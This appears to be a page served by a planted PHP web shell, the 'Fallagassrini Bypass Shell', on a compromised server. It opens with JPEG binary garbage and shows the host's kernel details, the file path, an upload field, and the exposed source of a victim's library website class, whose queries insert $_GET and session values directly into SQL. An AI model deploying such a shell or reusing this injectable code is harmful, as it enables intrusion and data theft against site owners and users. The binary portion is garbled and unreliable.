JFIF;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 85 C  !"$"$C$^" }!1AQa"q2#BR$3br %&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz w!1AQaq"2B #3Rbr $4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz ? C^",k8`98?þ. s$ֱ$Xw_Z¿2b978%Q}s\ŴqXxzK1\@N2<JY{lF/Z=N[xrB}FJۨ<yǽw 5o۹^s(!fF*zn5`Z}Ҋ">Ir{_+<$$C_UC)^r25d:(c⣕U .fpSnFe\Ӱ.չ8# m=8iO^)R=^*_:M3x8k>(yDNYҵ/v-]WZ}h[*'ym&e`Xg>%̲yk߆՞Kwwrd󞼎 r;M<[AC¤ozʪ+h%BJcd`*ǎVz%6}G;mcՊ~b_aaiiE4jPLU<Ɗvg?q~!vc DpA/m|=-nux^Hޔ|mt&^ 唉KH?񯣾 ^]G\4#r qRRGV!i~眦]Ay6O#gm&;UV BH ~Y8( J4{U| 14%v0?6#{t񦊊#+{E8v??c9R]^Q,h#i[Y'Š+xY佑VR{ec1%|]p=Vԡʺ9rOZY L(^*;O'ƑYxQdݵq~5_uk{yH$HZ(3 )~G Fallagassrini

Fallagassrini Bypass Shell

echo"
Fallagassrini
";
Current Path : /home/easwari/www/includes/classes/

Linux 141.162.178.68.host.secureserver.net 3.10.0-1160.114.2.el7.x86_64 #1 SMP Wed Mar 20 15:54:52 UTC 2024 x86_64
Upload File :
Current File : /home/easwari/www/includes/classes/class.Index.php

<?php
#####Class For Adding Content Management ######
class Index extends MysqlFns
{
 /* class constructor */
	function Index()
	{
 		$this->LDDisplayPath= $config['SiteGlobalPath']."class.Index.php";
  		global $config;
  		global $objSmarty;
  		$this->MysqlFns();
  		$this->Limit = 12;
		
		
  }
  

//*************************************************************************************************************************************************
	function category()
	{
  		global $objSmarty;
  	$SelQuery2		= 'SELECT * FROM `book` WHERE `is_deleted` = "0" AND new_book_alert="1" order By id DESC';
		$listing_split = new MsplitPageResults($SelQuery2, $this->Limit);
  if ( ($listing_split->number_of_rows > 0) )  {
   $objSmarty->assign('LinkPage_amc_view_tab',$listing_split->display_count (TEXT_DISPLAY_NUMBER_OF_RESULT));
   $objSmarty->assign('PerPageNavigation_amc_view_tab',TEXT_RESULT_PAGE1 . ' ' . $listing_split->display_links($this->Limit, get_all_get_params(array('page', 'info', 'x', 'y')))); 
   $PageList = $this->ExecuteQuery($listing_split->sql_query, 'selectassoc');
  }
   if(!empty($PageList) && is_array($PageList))
  {
  $objSmarty->assign('i', $listing_split->i);
  $objSmarty->assign('PageList', $PageList);//print_r($PageList);
  return $PageList;
  }
  elseif(empty($PageList) && is_array($PageList))
    $objSmarty->assign('ErrorMessage', 'No Records Found');
 }
/************************************For Best Reading Books**********************************************************/
function Getbooks()
{
global $objSmarty;
$date = date("F 1, Y", strtotime("-6 months"));//echo $date;
$date3 = date('Y-m-d', strtotime($date));//echo $date3;
$date2 = date("Y-m-d");//echo $date2;
if($_SESSION['Web_branchname'] != '')
{
 //$SelQuery2	= "select *,br.book_id,b.book_name,b.category from `book_receipt` br left join `book` b on br.book_id =b.id left join `images` m on m.isbn =b.isbn  where (b.category ='".$_GET['category']."' and br.branch_name='".$_SESSION['Web_branchname']."')";
 
 $SelQuery2	= "select *,COUNT(ch.book_id) as cnt,ch.book_id,ch.book_receipt_id,b.book_name,b.category,b.author from `check_out_in_history` ch left join `book` b on ch.book_id =b.id where b.category like '%".$_GET['category']."%' and ch.branch='".$_SESSION['Web_branchname']."' and ((ch.check_out_date between '$date3' and '$date2') or(ch.actual_check_in_date between '$date3' and '$date2')) GROUP BY ch.book_id HAVING COUNT(ch.book_id) > 1  ORDER BY cnt DESC ";
}
else
{
 //$SelQuery2	= "select *,br.book_id,b.book_name,b.category from `book_receipt` br left join `book` b on br.book_id =b.id left join `images` m on m.isbn =b.isbn  where (b.category ='".$_GET['category']."')";
 
   $SelQuery2	= "select *,COUNT(ch.book_id) as cnt,ch.book_id,ch.book_receipt_id,b.book_name,b.category,b.author from `check_out_in_history` ch left join `book` b on ch.book_id =b.id where b.category like '%".$_GET['category']."%' and ((ch.check_out_date between '$date3' and '$date2') or(ch.actual_check_in_date between '$date3' and '$date2')) GROUP BY ch.book_id HAVING COUNT(ch.book_id) > 1  ORDER BY cnt DESC ";
}
//"select *,br.book_id,b.book_name from `book_receipt` br left join `book` b on br.book_id =b.id left join `images` m on m.isbn =b.isbn  where (b.book_name like  '".$_POST['search_value']."%' or b.author like  '".$_POST['search_value']."%' or b.isbn like  '".$_POST['search_value']."%')";
  	// $SelQuery2		= 'SELECT * FROM `book` WHERE `category` = "'.$_GET['category'].'"';
		$listing_split = new MsplitPageResults($SelQuery2, $this->Limit);
  if ( ($listing_split->number_of_rows > 0) )  {
   $objSmarty->assign('LinkPage_amc_view_tab',$listing_split->display_count (TEXT_DISPLAY_NUMBER_OF_RESULT));
   $objSmarty->assign('PerPageNavigation_amc_view_tab',TEXT_RESULT_PAGE1 . ' ' . $listing_split->display_links($this->Limit, get_all_get_params(array('page', 'info', 'x', 'y')))); 
   $PageList2 = $this->ExecuteQuery($listing_split->sql_query, 'selectassoc');
  }
   if(!empty($PageList2) && is_array($PageList2))
  {
  $objSmarty->assign('i', $listing_split->i);
  $objSmarty->assign('PageList2', $PageList2);//print_r($PageList2);
  //return $PageList;
  }
  elseif(empty($PageList2) && is_array($PageList2))
    $objSmarty->assign('ErrorMessage', 'No Records Found');
}
/**************************************Best reading books default********************************************************/
function Getbooksdefault()
{
global $objSmarty;
$date = date("F 1, Y", strtotime("-6 months"));//echo $date;
$date3 = date('Y-m-d', strtotime($date));//echo $date3;
$date2 = date("Y-m-d");//echo $date2;
if($_SESSION['Web_branchname'] != '')
{
 //$SelQuery3	= "select *,br.book_id,b.book_name,b.category from `book_receipt` br left join `book` b on br.book_id =b.id left join `images` m on m.isbn =b.isbn  where (b.category like  'fiction%' and br.branch_name='".$_SESSION['Web_branchname']."')";
 
 $SelQuery3	= "select *,COUNT(ch.book_id) as cnt,ch.book_id,ch.book_receipt_id,b.book_name,b.category,b.author from `check_out_in_history` ch left join `book` b on ch.book_id =b.id where b.category like  'fiction%' and ch.branch='".$_SESSION['Web_branchname']."' and ((ch.check_out_date between '$date3' and '$date2') or(ch.actual_check_in_date between '$date3' and '$date2')) GROUP BY ch.book_id HAVING COUNT(ch.book_id) > 1  ORDER BY cnt DESC ";
}
else
{
// $SelQuery3	= "select *,br.book_id,b.book_name,b.category from `book_receipt` br left join `book` b on br.book_id =b.id left join `images` m on m.isbn =b.isbn  where (b.category like  'fiction%')";
 
  $SelQuery3	= "select *,COUNT(ch.book_id) as cnt,ch.book_id,ch.book_receipt_id,b.book_name,b.category,b.author from `check_out_in_history` ch left join `book` b on ch.book_id =b.id where b.category like  'fiction%' and ((ch.check_out_date between '$date3' and '$date2') or(ch.actual_check_in_date between '$date3' and '$date2')) GROUP BY ch.book_id HAVING COUNT(ch.book_id) > 1  ORDER BY cnt DESC ";

}
  	// $SelQuery3		= 'SELECT * FROM `book` WHERE `category` Like "fiction%"';
	$listing_split = new MsplitPageResults($SelQuery3, $this->Limit);
  if ( ($listing_split->number_of_rows > 0) )  {
   $objSmarty->assign('LinkPage_amc_view_tab',$listing_split->display_count (TEXT_DISPLAY_NUMBER_OF_RESULT));
   $objSmarty->assign('PerPageNavigation_amc_view_tab',TEXT_RESULT_PAGE1 . ' ' . $listing_split->display_links($this->Limit, get_all_get_params(array('page', 'info', 'x', 'y')))); 
   $PageList3 = $this->ExecuteQuery($listing_split->sql_query, 'selectassoc');
  }
   if(!empty($PageList3) && is_array($PageList3))
  {
  $objSmarty->assign('i', $listing_split->i);
  $objSmarty->assign('PageList3', $PageList3);//print_r($PageList2);
  //return $PageList;
  }
  elseif(empty($PageList3) && is_array($PageList3))
    $objSmarty->assign('ErrorMessage', 'No Records Found');
}
//*************************************************************************************************************************************************
	function book_detail()
	{
  		global $objSmarty;
  		$SelQuery1		= 'SELECT * FROM `book` WHERE `book_name` = "'.$_GET['bk_name'].'"';
		$listing_split2 = new MsplitPageResults($SelQuery1, $this->Limit);
  if ( ($listing_split2->number_of_rows > 0) )  {
   $objSmarty->assign('LinkPage_amc_view_tab',$listing_split2->display_count (TEXT_DISPLAY_NUMBER_OF_RESULT));
   $objSmarty->assign('PerPageNavigation_amc_view_tab',TEXT_RESULT_PAGE1 .' '. $listing_split2->display_links($this->Limit, get_all_get_params(array('page', 'info', 'x', 'y'))));   $PageList3 = $this->ExecuteQuery($listing_split2->sql_query, 'selectassoc');
  }
   if(!empty($PageList3) && is_array($PageList3))
  {
  $objSmarty->assign('i', $listing_split2->i);
  $objSmarty->assign('PageList3', $PageList3);
  return $PageList3;
  }
  elseif(empty($PageList3) && is_array($PageList3))
    $objSmarty->assign('ErrorMessage', 'No Records Found');
 }
 /****************************************New Books *****************************************************************************/
 function new_books()
	{
  		global $objSmarty;
  	$SelQuery		= 'select * from book where new_book_alert=1 ORDER BY date_of_arrival_new DESC Limit 0,5';
	$NewBookDetail	= $this->ExecuteQuery($SelQuery, 'select');
    $objSmarty->assign('NewBookDetail', $NewBookDetail);//print_r($RecDetail);
 }
  /****************************************Famous Author *****************************************************************************/
 function famous_authors()
	{
  		global $objSmarty;
  	$SelQuery		= 'SELECT * FROM author order by check_inout_count DESC LIMIT 0, 100';
	$FamousAuthDetail	= $this->ExecuteQuery($SelQuery, 'select');
    $objSmarty->assign('FamousAuthDetail', $FamousAuthDetail);//print_r($RecDetail);
 }
 /*********************************************************************************************************************/
 function recom_books()
	{
  		global $objSmarty;
  	$SelQuery2		= 'SELECT * FROM `recommended_books` WHERE `status` = "1" ORDER BY timestamp DESC';
	$RecDetail	= $this->ExecuteQuery($SelQuery2, 'select');
    $objSmarty->assign('RecDetail', $RecDetail);//print_r($RecDetail);
 }
 
 function media_list()
 {
 global $objSmarty;
 
 $UpQuery5 = 'SELECT * FROM `media` WHERE `status` = "1" ';
 $BookDetail3 =	$this->ExecuteQuery($UpQuery5, 'select');//print_r($BookDetail3);
 $objSmarty->assign('BookDetail3', $BookDetail3);
 }
 /*********************************************************************************************************************/
 function our_services()
	{
  		global $objSmarty;
  	$SelQuery2		= 'SELECT * FROM `services` WHERE `status` = "1" ';
	$SerImgDetail	= $this->ExecuteQuery($SelQuery2, 'select');
    $objSmarty->assign('SerImgDetail', $SerImgDetail);//print_r($PageList);
	
	$SelQuery22		= 'SELECT * FROM `services` WHERE `status` = "2" ';
	$SerImgDetail2	= $this->ExecuteQuery($SelQuery22, 'select');
    $objSmarty->assign('SerImgDetail2', $SerImgDetail2);
 }

 }
?>


bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: contact@elmoujehidin.net